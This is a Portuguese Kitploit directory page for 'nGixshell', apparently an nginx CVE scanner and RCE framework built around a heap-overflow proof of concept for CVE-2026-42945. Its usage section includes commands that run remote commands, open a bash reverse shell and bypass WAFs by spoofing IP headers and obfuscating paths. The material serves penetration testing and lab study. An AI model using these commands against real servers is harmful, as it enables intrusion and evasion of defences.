Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
nGixshell — scanner de CVE nginx + framework de exploração RCE (CVE-2026-42945 + mais 16) | Kitploit
Ferramentas/GitHubGitHub/mateusverass/ngixshell
ReconhecimentoScanners de VulnerabilidadesFrameworks de ExploraçãoExploração de Aplicações WebBypass de WAFSegurança WebTestes de PenetraçãoComando e ControleEnumeração de SubdomíniosRed TeamingDesenvolvimento de Payloads
21832há 3 diasRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHubmateusverass/ngixshell

nGixshell

scanner de CVE nginx + framework de exploração RCE (CVE-2026-42945 + mais 16)

Ver Repositório
Compartilhar
nGixShell

Python CVEs Zero deps License


nGixShell é um scanner de CVEs do nginx e framework de exploração de RCE. Ele inclui uma prova de conceito para CVE-2026-42945 (CVSS 3.1 8.1 HIGH segundo F5/NVD) — um heap buffer overflow no ngx_http_rewrite_module — e um scanner que cobre 64 CVEs do nginx com sondagens HTTP automatizadas, fingerprinting, detecção/bypass de WAF, auditoria de segurança web e geração de relatórios.

Zero dependências externas. Apenas a biblioteca padrão do Python 3.

Pré-requisitos do exploit (leia primeiro). --cmd / --shell só funcionam quando todas estas condições são verdadeiras: o alvo é x86_64, a configuração vulnerável de rewrite+set está presente, o ASLR está desabilitado, e os endereços de heap/libc foram calibrados para exatamente aquela build (calibrate.py → --build-file). Veja Requisitos do Exploit. O scanner em si não possui tais requisitos.


Início Rápido

# Spin up the vulnerable lab (builds nginx from source, ASLR disabled)
docker compose -f env/docker-compose.yml up -d --build

# Auto mode — fingerprint + CVE scan + web audit (works on any arch)
python3 ngixshell.py 127.0.0.1:19321

# RCE — calibrate, restart the worker for a clean heap, then exploit
W=$(pgrep -f 'nginx: worker' | head -1)
sudo python3 calibrate.py 127.0.0.1 19321 "$W" --spray-path /spray \
    --spray-mode full --json -o profile.json
docker compose -f env/docker-compose.yml restart nginx-vuln
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id > /tmp/rce.txt' \
    --build-file profile.json
docker compose -f env/docker-compose.yml exec nginx-vuln cat /tmp/rce.txt

# Drop a reverse shell (IP auto-detected)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell --build-file profile.json

# Detect and bypass WAF, then scan
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Subdomain scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Multiple targets from a file (one report per target)
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

Nenhuma flag é necessária — apontar a ferramenta para um alvo executa tudo automaticamente.
O TLS é detectado automaticamente. O nginx é identificado por fingerprint mesmo com server_tokens off.

system() não captura stdout: --cmd 'id' executa mas não imprime nada de volta. Use um comando com efeito colateral observável e confirme-o com --verify-url http://target/pwned (HTTP 200 = confirmado).


Uso

python3 ngixshell.py [TARGET] [OPTIONS]

TARGET formats:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

Modos

FlagDescrição
(nenhuma)Auto — fingerprint + varredura de CVE + auditoria web
--cmd 'CMD'Executa comando via RCE do CVE-2026-42945
--cmd-file FILEExecuta comandos a partir de arquivo (unidos com ;)
--shellAbre um reverse shell
--shell-type TYPEPayload: bash python perl php nc powershell (padrão: python)
--upgrade-shellEnvia automaticamente upgrade de PTY após o shell conectar
--verify-url URLApós um crash detectado, busca a URL para confirmar que o comando executou (200 = verificado)
--subdomain-scan DOMAINEncontra nginx vulnerável em subdomínios
--cve CVE-IDTesta um CVE específico
--list-cvesImprime todos os 64 CVEs com CVSS e informações de sondagem
--list-candidatesImprime candidatos de endereço de heap
--dry-runApenas fingerprint + varredura, sem exploit
--target-file FILEVarre múltiplos hosts a partir de um arquivo

Ajuste do exploit

FlagDescrição
--build-file FILERecomendado. Perfil de calibração JSON de calibrate.py --json -o FILE
--offsets SPECOffsets de heap em hexadecimal separados por vírgula de calibrate.py (ex.: 0x5a427,0x60e67)
--heap-base HEX / --libc-base HEX / --system-addr HEXSubstituições manuais de endereço
--build KEYPerfil embutido (apenas a referência do lab DepthFirst é fornecida)
--rewrite-path PATHLocalização vulnerável de rewrite (padrão /api)
--spray-path PATHLocalização com proxy_pass usada para o spray no corpo do POST (padrão /upload; o lab incluído usa /spray)
--spray-mode partial|fullpartial: corpo curto + Content-Length grande (lab incluído); full: corpo completo + X-Delay (lab DepthFirst)
--pad-a N / --pad-plus NPreenchimento do caminho de trigger antes da sequência + (padrões 349 / 969, do PoC do fornecedor)
--continue-on-crashContinua tentando os candidatos de heap restantes após um crash não verificado
--tries N / --spray N / --body-len NTentativas de trigger por candidato / conexões de spray / tamanho do corpo do spray

Detecção e Bypass de WAF

FlagDescrição
--waf-detectDetecta WAF antes da varredura
--waf-bypassHabilita todas as técnicas de bypass (também executa a detecção)
--waf-ip IPFalsifica este IP nos cabeçalhos de bypass (padrão: RFC1918 aleatório)

Técnicas de bypass (todas ativas quando --waf-bypass está definido):

TécnicaDetalhe
Falsificação de IPX-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
Rotação de UA11 User-Agents reais de navegador/bot, randomizados por requisição
Ofuscação de caminhobarra dupla, preenchimento /./, percent-encoding, variação de maiúsculas/minúsculas
Embaralhamento de maiúsculas em cabeçalhosrandomiza o uso de maiúsculas/minúsculas nos nomes de cabeçalhos para quebrar a correspondência de padrões do WAF

WAFs detectados: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence

Auditoria Web

Executa automaticamente no modo de varredura. Todos os módulos podem ser ignorados individualmente.

FlagDescrição
--skip-headersIgnora auditoria de cabeçalhos de segurança HTTP
--skip-pathsIgnora descoberta de caminhos/arquivos
--skip-vhostsIgnora enumeração de virtual hosts
--skip-tlsIgnora auditoria de protocolo TLS
--path-wordlist FILECaminhos extras para sondar (um por linha)
  • Auditoria de cabeçalhos — HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy, cabeçalhos que vazam versão
  • Descoberta de caminhos — mais de 50 caminhos; sondagem sentinela elimina falsos positivos de regras catch-all 403/301
  • Enumeração de virtual hosts — requer diferença de status E de corpo para evitar falsos positivos de bloqueio padrão
  • Auditoria TLS — testa suporte a TLS 1.0–1.3, expiração de certificado e detecção de autoassinado
  • stub_status — analisa métricas de conexões ativas de /nginx_status se exposto

Conexão

FlagDescrição
--port PORTSubstitui a porta
--tlsForça TLS (detectado automaticamente por padrão)
--proxy URLProxy: http://, https://, socks5://

HTTP

FlagDescrição
--user-agent UAUser-Agent personalizado
--auth USER:PASSAutenticação HTTP Basic
--cookie VALUECabeçalho Cookie
--header NAME:VALUECabeçalho extra (repetível)

Taxa / Temporização

Baixar ferramenta